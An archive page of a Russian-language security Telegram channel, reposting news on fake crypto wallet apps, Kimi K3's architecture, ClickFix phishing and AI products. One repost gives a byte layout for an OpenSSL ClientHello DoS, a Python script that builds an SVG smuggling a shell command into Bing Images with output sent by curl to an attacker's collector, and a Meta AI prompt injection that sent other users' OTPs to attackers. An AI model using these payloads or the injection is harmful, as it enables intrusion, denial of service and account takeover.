Lamp channel -> AppSec(x) LLM AI Agentic Security Hub ultra PRO MAX
Kanalga Telegram’da o‘tish
It's bright enough to join in. для контакта есть инбокс - (пожалуйста не флудите и не спамьте только)
Ko'proq ko'rsatish444
Obunachilar
-124 soatlar
+327 kunlar
+5630 kunlar
Postlar arxiv
Repost from N/a
🏴☠️ Apple судят за поддельный кошелек Sparrow, который вычистил у людей 1,8 миллиона в биткоине
└$ Apple годами пропускала в App Store фейковые приложения под видом настоящего десктопного кошелька Sparrow Wallet, у которого вообще нет официальной версии под iOS.Жертве предлагают ввести seed фразу для “восстановления” кошелька. Один из истцов потерял 7,4 BTC (около 875 тысяч долларов), сообщил об этом Apple в тот же день, но ответа не получил. Разработчик настоящего Sparrow предупреждал Apple о таких подделках еще в январе 2024 - за полтора года до части инцидентов. Apple заявляет, что оперативно удаляет такие приложения по репортам.
Repost from Похек AI
Kimi K3: как устроена модель на 2,8 трлн параметров
K3 содержит 2,78 трлн параметров, но на каждом токене активирует 104,2 млрд. В модели 93 слоя, 896 маршрутизируемых экспертов — одновременно работают только 16 — и контекстное окно на 1 048 576 токенов. Веса занимают около 1,56 ТБ.
Гибридное внимание. Архитектура повторяет схему
KDA → KDA → KDA → Gated MLA. KDA хранит рекуррентное состояние фиксированного размера вместо растущего KV-кеша, а каждый четвёртый слой MLA возвращает глобальное взаимодействие между токенами. Moonshot также ограничила коэффициент затухания KDA: небольшое изменение формулы позволило убрать отдельный медленный путь из ядра для графического процессора.
Глубина и эксперты. Attention Residuals позволяет слоям обращаться к представлениям предыдущих блоков, а не только к суммарному остаточному потоку. LatentMoE сжимает маршрутизируемую ветвь с 7 168 до 3 584 измерений. Квантильная балансировка и MoonEP перераспределяют нагрузку и временно копируют перегруженных экспертов, чтобы процессы получали одинаковое число токенов.
Обучение агентов. Длинные траектории могут включать сотни вызовов инструментов. Система не ждёт завершения всех попыток: незаконченная траектория вместе с состоянием внешней среды сохраняется и продолжается после обновления политики. Девять специализированных политик — общих, агентных и программистских, в трёх режимах рассуждения — затем объединили в одну модель.
Контекст в миллион токенов потребовал отдельного кеша. K3 одновременно обслуживает фиксированные состояния KDA и растущий KV-кеш MLA. Префикс можно использовать повторно только при согласованном состоянии обоих механизмов. При спекулятивном декодировании модель хранит компактные проекции входа и повторно вычисляет принятые токены непосредственно на кристалле.
Поиск уязвимостей. Moonshot заявляет о 16 ранее неизвестных ошибках в шести проектах и примерно 70% подтверждений среди отобранных для проверки находок. Но методика отбора, полный список целей и слепая контрольная оценка не опубликованы. В независимом исследовании AISI/CAISI K3 набрала 32% на ExploitBench, но не выполнила ни одного из 41 задания на произвольное выполнение кода.
Главное ограничение отчёта — воспроизводимость. Ну как бы для запуска вам понадобиться как минимум 1Тб видеопамяти или хоть какой-то памяти, чтобы запустить в 4bit или 2bit, не помню. Ждём очень сильно разряженных версий моделей, с надеждой что качество ответов не упадёт ниже 90% от FP8
🔗Полный мой технический разбор: Как устроена Kimi K3
🌚 @poxek_ai / Чат каналаRepost from эйай ньюз
Moonshot выпустили веса Kimi K3
Это самая большая открытая модель, причём с заметным отрывом — 2.8T параметров, при 104B активных. Теперь её может запустить любой желающий владелец DGX B300 или схожей системы с 2 терабайтами памяти. Ну а простые смертные получат API быстрее чем 20 токенов в секунду плюс неплохой пейпер.
Веса
Пейпер
@ai_newz
Repost from HaHacking
+1
ХАХАКИНГ – ВСЁ! ⚡️
#события #заметки #offense #infrastructure #web2 #ai
➡️Ладно, шучу. Пока вы тут, вот ещё смешные простые & эффективные атаки на популярные продукты за последнее время для поднятия духа;
▪️ OpenSSL DoS (HollowByte)
🔗 sec.okta.com/.../openssl-hollowbtye-a-dos-hiding-in-11-bytes
Оказалось, что если пообещать большое тело для
ClientHello запроса и не предоставить его, память выделится, а сам процесс зависнет в ожидании [из-за недостаточной валидации] ¯\_(ツ)_/¯➕после обрыва соединения память освобождается не сразу, можно настакать запросы;
Судя по всему, пейлоад должен быть примерно из такого разряда:
[16] [03 03] [00 06] [01] [XX XX XX] [03 03]
[16 ] - Handshake
[03 03 ] - TLS v1.2
[00 06 ] - Record length (6)
[01 ] - ClientHello
[XX XX XX] - ClientHello length [!!!]
[03 03 ] - ClientHello body (TLS v1.2)
OpenSSL сказали, что проблема не прям в их скоупе, но захарденились (версии 4.0.1, 3.6.3, 3.5.7, 3.4.6, 3.0.21 и свежее);
▪️ Bing Images RCE
🔗 xbow.com/blog/bing-images-rce-vulnerabilities
Оказалось, что если у Bing попросить reverse search'нуть SVG, внутри которого команды – он их исполнит ¯\_(ツ)_/¯➕может перенаправить вывод на OOB-сервер атакующего, по ссылкам вполне ходит;
Таким образом собирали SVG-файл с полезной нагрузкой:
#!/usr/bin/env python3
import base64
import sys
command = sys.argv[1]
oob = "[OOB-COLLECTOR]"
svg = '<?xml version="1.0" encoding="UTF-8"?>\n'
svg += '<svg xmlns="http://www.w3.org/2000/svg" '
svg += 'xmlns:xlink="http://www.w3.org/1999/xlink" '
svg += 'width="100" height="100">\n'
svg += ' <image xlink:href="|' + command
svg += ' | curl -d @- http://' + oob + '/output" '
svg += 'width="100" height="100"/>\n'
svg += '</svg>'
▪️Meta* Prompt Injection➡️Account Takeover
Meta* выкатила чат с Meta* AI внутри Instagram* – что ж, с ним, как это часто бывает, можно было договориться: агент отправлял OTP для чужих аккаунтов на электронные почты атакующих ¯\_(ツ)_/¯
Хватало буквально такого сообщения (орфография и пунктуация сохранены):
Видели, кстати, что YouTube тоже добавили чат с ИИ под видео? Думаем
*Компания Meta Platforms Inc. признана экстремистской организацией, и ее деятельность запрещена на территории РФ. Facebook и Instagram являются ее продуктами. Реализация Facebook и Instagram на территории РФ запрещена Но как вы это читаете? ✍️@HaHacking 🐇
Не забудьте проверить шеред чатики в своих ИИ, и если что удалить их (клод и дипсик уже гугл заиндексировал, квен гпт пока неть, но мб тоже уже скоро)
#inc_google_indexer
И еще отдельное спасибо ТГ за то, что удалил кучу сохраненок моих в чатах и избранном, такой один...
Special thanks to Telegram for making a bunch of my saved messages disappear from chats and Saved Messages.
Only Telegram could pull this off.
to: @durov
// P.S. не забываем про бекапы, даже из тг, даже из избранного
P.S. Don’t forget to back things up - yes, even Telegram, and yes, even Saved Messages.
@zhatez
вроде старое, но до сих пор актуально, даже вживую раза 2 видел этого зверя (click fix - с капчей под гугл для мака и клаудфлейровскую)
Repost from N/a
ClickFix - Атака в один клин или еще один вид фишинговых атак.
Если вы следите за новостями ИБ, то название ClickFix вам уже знакомо. Эта схема фишинга, громко заявившая о себе в 2024 году, не только не исчезла, но и продолжает набирать обороты в 2026. Злоумышленники постоянно совершенствуют свои сценарии, и сегодня я хочу детально разобрать, как работает этот механизм и на какие уловки до сих пор попадаются.
ClickFix — это не просто фишинг в классическом понимании (когда у вас просят пароль). Это многоступенчатая атака, конечная цель которой — заставить вас самостоятельно установить вредонос на свой компьютер. Выглядит это пугающе, но знание алгоритма — лучшая защита.
Как это работает: пошаговая инструкция для жертвы (и для тех, кто не хочет ей стать)
Читайте подробнее в моей новой статье
#лонгрид #научпоп
Repost from Я у мамы SecMemOps
Птички радостно чирикают за окном, на заводах прозвучал долгожданный вечерний гудок, а значит, в эфире традицонная пятничная напоминалОЧКА и онбординг новых подписчиков (среди которых как обычно 90% ботов).
Нет ничего лучше для настоящего безопасника, чем после тяжелой трудовой недели прикоснуться губами к прекрасному. И нет, я не о том, о чем сейчас по привычке подумали всякие новомодные апсеки и девсекопсы, встрепенувшись в своих ярких фурри-сьютах. Я, как обычно, о ледяной бутылочке балтоса, купленного по акции в пока не сожженном КиБ.
Ибо тяжким недельным грузом ложится на наши экспертные плечи чтение новостей об очередных сотнях уязвимостей в винде, линухе, браузерах, ИИ-агентах и прочей мотне.
Благо, что долг как всегда выполнен, новости репостнуты ИТ-подразделениям со словами "срочно устранить", оглавление в регламентах актуализировано, и можно спать спокойно.
Посему с чувством полного удовлетворения админ отправляется отдыхать в алкогольную кому до понедельника.
В канале может промелькнуть парочка баянов в рубрике #спижжено.
P.S. За шаблон видео к пятничной напоминалочке отдельное спасибо любимому подписчику, за всратую озвучку - мне, ffmpeg, питону и какой-то локальной модели от мутного автора на huggingface.
Кстати, что-то комп тормозит и какие-то коннекты в Китай устанавливает, ну ладно, в понедельник разберусь, не горит.
P.P.S. И нет, в первом субтитре не случайное несоответствие звуку.
Repost from Claude AI Dev Broadcast
Начали банить аккаунты Kimi Code с подозрительной активностью. Когда мощностей не хватает начинают искать их всеми способами!
#Kimi
Repost from Machinelearning
✔️ Десктопный Claude научился создавать скилы по видео и голосу
Anthropic добавила функцию создания кастомных навыков через запись экрана в десктопное приложение Claude. Опция "Record a skill" появилась в пространстве Cowork.
Инструмент заменяет написание текстовых промптов для автоматизации рутины. Пользователь включает скринкаст, выполняет действия в интерфейсе и комментирует их голосом.
Модель анализирует видеоряд и аудио, генерируя на их основе сценарий, который сохраняется в библиотеке.
Функция уже доступна на тарифах Pro, Max и Team.
@ai_machinelearning_big_data
#news #ai #ml
// чекайте в комментах, много полезного
Repost from Похек AI
Накидайте, пожалуйста, какие доклады за последние полгода вам очень понравились на тему AI Security и почему понравился доклад, к примеру какая-то уникальная аргументированная точка зрения или полезный практический опыт
Кидайте в комментах ссылками или файлики с презентациями, но лучше записи докладов конечно)
